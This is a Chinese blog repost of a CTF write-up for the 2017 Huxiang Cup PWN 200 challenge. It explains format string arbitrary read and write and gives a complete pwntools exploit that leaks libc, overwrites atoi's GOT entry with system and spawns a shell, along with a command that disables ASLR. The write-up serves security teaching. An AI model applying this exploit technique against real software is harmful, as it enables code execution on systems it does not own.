linux调用system参数格式化,湖湘杯2017 PWN 200格式化字符串漏洞详细WriteUp

最新推荐文章于 2023-10-12 18:37:34 发布
最新推荐文章于 2023-10-12 18:37:34 发布
阅读量208 收藏
点赞数
文章标签: linux调用system参数格式化

*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。

格式化字符串漏洞原理

pwn题中,有形如下述代码的形式就是格式化字符串漏洞char str[100];

scarf("%s",str);

printf(str)

也许使用者的目的只是直接输出字符串,但是这段字符串来源于可控的输入,就造成了漏洞。

示例程序如下

006tKfTcly1fnrrigi61sj30bf06mmxh.jpg

编译:gcc -m32 -o str str.c输入%2$x

006tKfTcly1fnrrzf2j3tj30n7057jsv.jpg

006tKfTcly1fnrs2ippg5j30f207xjt3.jpg

原因是如果直接printf("占位符")这种形式,就会把栈上的偏移当做数据输出出来。通过构造格式化串,就可以实现任意地址读和任意地址写。

任意地址读

事实上,我们在scanf(或者read)来输入字符串的时候,字符串就已经在栈中了,如图,可以看出偏移为6。如果我们构造出addr(4字节)%6$s,就能读取这个地址的值了。

006tKfTcly1fnrscx59nzj30hv04qwfs.jpg

我们尝试一下,输入AAAA%6$s,当然不可能真的读到地址为41414141的内存值,不过从下图我框起来的内容就知道,如果我们输入一个合法的值,就可以读了。

006tKfTcly1fnrskfkzv5j30l00hn42v.jpg

任意地址写

和上面的任意地址读是同理的,只不过利用了格式化字符串的一个比较冷门的特性,%n。

这个占位符可以把它前面输出的字符的数量,写入指定的地址。

比如printf("abc%n", &val);

val的值就被改变为3,我们一般都用pwntools自带的fmt_str来生成格式化串fmt_str(offset,size,addr,target)offset表示要覆盖的地址最初的偏移

size表示机器字长

addr表示将要覆盖的地址

target表示我们要覆盖为的目的变量值

赛题链接

打开IDA跟入调试

006tNc79ly1fnq89d4w5qj30m40biabl.jpg

006tNc79ly1fnq88fzh3pj30w00r8afi.jpg形如char buf[100]

scanf("%s",buf);

printf(buf);

找到格式化字符串漏洞

利用漏洞

checksec查看保护

006tNc79ly1fnq8hv6sgdj30i8080jsr.jpg

tips1查看本机ASLR

006tNc79ly1fnq8kg22vwj30kb06smze.jpg

so地址变动,确定本机开启了aslr关闭ASLRecho 0 > /proc/sys/kernel/randomize_va_space确认关闭

006tNc79ly1fnq8nmhuy3j30jc067gmz.jpg

利用思路printf(&buf);

puts("GET YOUR AGE:\n");

read(0, &buf, 0x40u);

if ( atoi(&buf) > 60 )

puts("OLD MEN!\n");

看到printf(&buf)之后read(buf)atoi(buf)所以我们的思路就是:利用格式化字符串漏洞的任意地址读,先leak出puts函数的地址puts_addr。利用格式化字符串漏洞的任意地址写,去将atoi函数在got.plt表中的地址改为system函数的地址,然后通过read去控制buf,传入"/bin/sh",构造出system("bin/sh"),获取shell。关于覆盖got表,不知道为什么的话,参考下面的文章。 https://www.jianshu.com/p/0ac63c3744ddhttp://rickgray.me/use-gdb-to-study-got-and-plt

leak出puts函数的地址

006tNc79ly1fnqg75wqhuj31bo0yen3e.jpg

在gdb中调试(这里我使用了gef插件),可以看出地址在7个参数(仔细分析一下AAAA%7$x,把AAAA换掉就是地址,把%x换成%s就可以打印出内容)

计算system地址

libc.symbols['system'] - libc.symbols['puts'] + u32(puts_addr)

覆盖got表中atoi的内容为system地址

原理printf("abc%nabc\n", &val);

printf("val = %d\n", val);

输出为abcabc

val = 3

之前我们已经调试过了"AAAA"就在第7个参数,所以只需构造{addr}{适当的写入值}{%7$n}即可。

这里pwntools提供了fmtstr_payload函数来自动生成格式化串。fmtstr_payload(参数偏移,{xxx_got_addr: system_addr})

getshell

006tNc79ly1fnqhotz7ahj30d708mdh6.jpg

exp# coding:utf-8

from pwn import *

elf = ELF('pwne')

# conn=remote('ip',port)

libc = ELF('/lib/i386-linux-gnu/libc.so.6')

# libc=ELF('libc.so.6')

p = process('./pwne')

p.recvuntil('[Y/N]\n')

p.sendline('Y')

p.recvuntil('NAME:\n\n')

p.sendline(p32(elf.got['puts']) + '%7$s')

p.recvuntil('WELCOME \n')

puts_addr=p.recv()[4:8]

# print u32(put_addr)

system_addr = libc.symbols['system'] - libc.symbols['puts'] + u32(puts_addr)

atoi_got_addr = elf.got['atoi']

p.sendline('17')

p.recvuntil('[Y/N]\n')

p.sendline('Y')

p.recvuntil('NAME:\n\n')

p.sendline(fmtstr_payload(7, {atoi_got_addr: system_addr}))

p.recvuntil('GET YOUR AGE:\n\n')

p.sendline('/bin/sh\x00')

p.interactive()

总结

在CTF中,一般使用格式化字符串漏洞的任意地址读来leak出某函数的got表地址,然后计算出system的地址。

再通过任意地址写的功能,来覆盖got表,从而调用system('bin/sh')来getshell。

*本文作者:Sakura_zero,转载请注明来自reeBuf.COM

weixin_35948624
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
2. pwn入门新手做system没有参数(内含函数调用过程),需要自己构造的攻防世界cgpwn2,求大佬指教
qiudalaojiao的博客
02-07 1935
我们拿到文件之后放到 linux里checksec一下 一个32位文件 ,开了nx 把文件拖入 ida f5开始分析 main 函数 我们看到了hello() 函数 点进去 进行分析 我们看到了比较重要的几行交互代码,,我们看看下面的部分首先要求我们输入一个名字,这个输入是通过fgets函数完成的,从键盘读取最多32h个字符到name区域 我上网百度了一下 fgets的函数原型 我们双击f...
pwn 格式化字符串漏洞
清霂的博客
03-10 445
7.cgpwn2 file checksec ida32
System.Str - 将数字格式化字符串
weixin_33711647的博客
09-26 75
为什么80%的码农都做不了架构师?>>> ...
linux shell 函数 格式化,速查笔记(linux shell编程)
weixin_39879881的博客
05-10 140
零、shell中的内部变量:1. $?: 表示shell命令的返回值.2. $$: 表示当前shell的pid.3. $!: 最后一个放入后台作业的PID值.4. $0: 表示脚本的名字.5. $1--$9,${10}: 表示脚本的第一到九个参数,和第十个参数.6. $#: 表示参数的个数.7. $*,$@: 表示所有的参数.两者的区别如下: //都是双引号惹的祸^-...
Pwnprintf漏洞
weixin_52553215的博客
03-10 1101
参考:https://bbs.pediy.com/thread-250858.htm Format String 介绍 1 printf("Team Name: %s\tPoints: %d\n", "Whitzard", 999); 在上面这行语句中, "Team Name: %s\tPoints: %d\n"为格式化字符串(即printf第一个参数),"Whitzard"、999分别为第二个和第三个参数。在格式化字符串解析时,格式化字符串中的 "%s" 对应
2017湖湘pwn100的题目
11-30
2017湖湘pwn100的题目的二进制文件和libc的二进制文件
2017湖湘pwn200
12-02
【标题】"2017湖湘pwn200"是一个网络安全竞赛中的挑战项目,专注于Pwn(破解)类别。在这个挑战中,参赛者需要利用编程和安全漏洞的知识来解决问题,通常涉及缓冲区溢出、格式字符串漏洞、堆溢出等攻击技术。这个...
2017湖湘pwn400
12-09
2017湖湘pwn400的pwn题目,喜欢的就下载下来做一下。。
2017湖湘pwn300
12-03
2017湖湘pwn300的题目,请大家自行下载。。。。。。
struts-pwn:Apache Struts CVE-2017-5638的漏洞利用
05-18
Apache Struts CVE-2017-5638的漏洞利用 用法 测试单个URL。 python struts-pwn.py --url 'http://example.com/struts2-showcase/index.action' -c 'id' 测试网址列表。 python struts-pwn.py --list 'urls.txt' ...
re-for-beginners 逆向工程入门指南
04-29
re-for-beginners翻译版本,逆向工程的入门指南,值得一看 re-for-beginners翻译版本,逆向工程的入门指南,值得一看
PWN简单堆栈溢出漏洞利用(二)
SkYe's Blog
08-12 786
PWN简单堆栈溢出漏洞利用(二) 题目来源 下载链接(密码akcz) 题目需要读取flag文件才能正确显示出flag,也就是下文中显示的 This is flag 创建办法: 在/home/pwn/pwn1目录下创建一个名为flag文件,打开并写入This is flag 1. 运行程序、查看文件类型、保护措施 程序让我们输入一段字符串,并返回我们所输入的内容。 看到是一个 32位 动态链...
[PolarCTF]PWN-8字节能干什么
最新发布
2301_79932273的博客
10-12 160
泄漏出ebp的值后,还需要计算一下相对的偏移。继续在ida里查看题目,还可以看到shell函数,但只提供了。,这里存在溢出,但是只能溢出8个字节,刚好覆盖。知道了偏移和ebp,就可以算出输入的起始地址。程序为32为elf文件,并开启了NX保护。,我们就可以根据相应的偏移来定位栈的位置。前的4个字节无所谓,可以随便填,此时。是需要根据输入长度进行计算的。的函数,溢出长度只有8字节无法构造。的值也打印出来,这就泄漏了。,计算便宜确定栈的位置;的地址已经无所谓了,所以。通过第一次输入输出泄露。
pwn入门笔记(4)——如何利用printf漏洞突破canary保护
weixin_45551695的博客
07-29 437
实例分析 编译printf2.c ,要加canary保护 输入 写exp,利用printf漏洞来突破canary 并且覆盖ret #include<stdio.h> void exploit() { system("/bin/sh"); } void func() { char str[0x20]; read(0, str, 0x50); printf(str); read(0, str, 0x50); } int main() { func()
Pwn学习历程(1)--基本工具、交互、调试
热门推荐
Aka丶的博客
12-02 5万+
1、 从基础开始1.1 简单原理介绍以下内容摘自Wiki:   Pwn是一个骇客语法的俚语词,自”own”这个字引申出来的,这个词的含意在于,玩家在整个游戏对战中处在胜利的优势,或是说明竞争对手处在完全惨败的情形下,这个词习惯上在网络游戏文化主要用于嘲笑竞争对手在整个游戏对战中已经完全被击败(例如:”You just got pwned!”)。   在骇客行话里,尤其在另外一种电脑技术方面,包
[pwn]关于printf输出时机的坑
Breeze的博客
08-26 8313
关于printf输出时机的坑 今天遇到了一个特别有意思的题,本来很简单的利用,但一直没有算出来,最后发现是一个很简单的却很细节的问题。 welpwn详细writeup 题目地址:welpwn 首先查看一下安全策略: 保护很少,然后看一下代码逻辑: read读入了0x400个字节,一般这么长必有溢出,注意echo并不是系统函数,查看echo逻辑: s2只有16个字节,但却复制了一个0x400字...
ISG pwnme100 poc 学习
Bluish Assassin's Creed
11-21 2115
ISG pwnme100 poc 学习 背景 最近在学习ISG2015比赛的 FlappyPig 的writeup(http://bobao.360.cn/learning/detail/702.html),对其中的pwn比较感兴趣,因此查阅了部分资料后对poc进行了研究。 其中在csdn上海枫的专栏(http://blog.csdn.net/column/details/buffer-ove
黑帽大会:黑客把入侵汽车当兴趣
chihyin的博客
08-07 1808
照片来自:REEBUF来自美国的安全工程师Charlie Miller和Chris Valasek,给大家带来万众期待的远程操控汽车研究。(看之前文章:危险!克莱斯勒汽车系统漏洞 黑客可以远程控制行驶车辆)两位工程师再黑帽大会发布演讲,点击链接可观看视频。Charlie Miller和Chris Valasek能从远端黑入吉普车。这两位研究员为科技媒体《Wired》记者Andy Greenbe...
2021湖湘 Hideit Writeup
qq_41866334的博客
11-15 3211
2021湖湘 Hideit AAA : immortal 动态调试 直接x64dbg动调找到了关键的加密代码分别是xxtea 和 chacha20,直接动调从中拿出各种参数然后写代码进行解密。其实一开始没看出来chacha20,找到了这篇文章 逆向中常见的Hash算法和对称加密算法的分析 . 解密dll 后来在赛后和队友交流发现这题其实在数据段放了一个加密的dll文件,在解密段可以x64dbg dump出dll的代码。断点下在memncpy上,解密结束后就可以dump出对应的地址,删去pe头之前的
pwn格式化字符串漏洞
08-30
pwn中的格式化字符串漏洞是指通过向程序输入格式化字符串,然后利用程序内部的输出函数来读取或修改内存中的数据。这种漏洞会导致程序的安全性受到威胁,攻击者可以利用该漏洞执行任意代码或者获取敏感信息。 格式...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值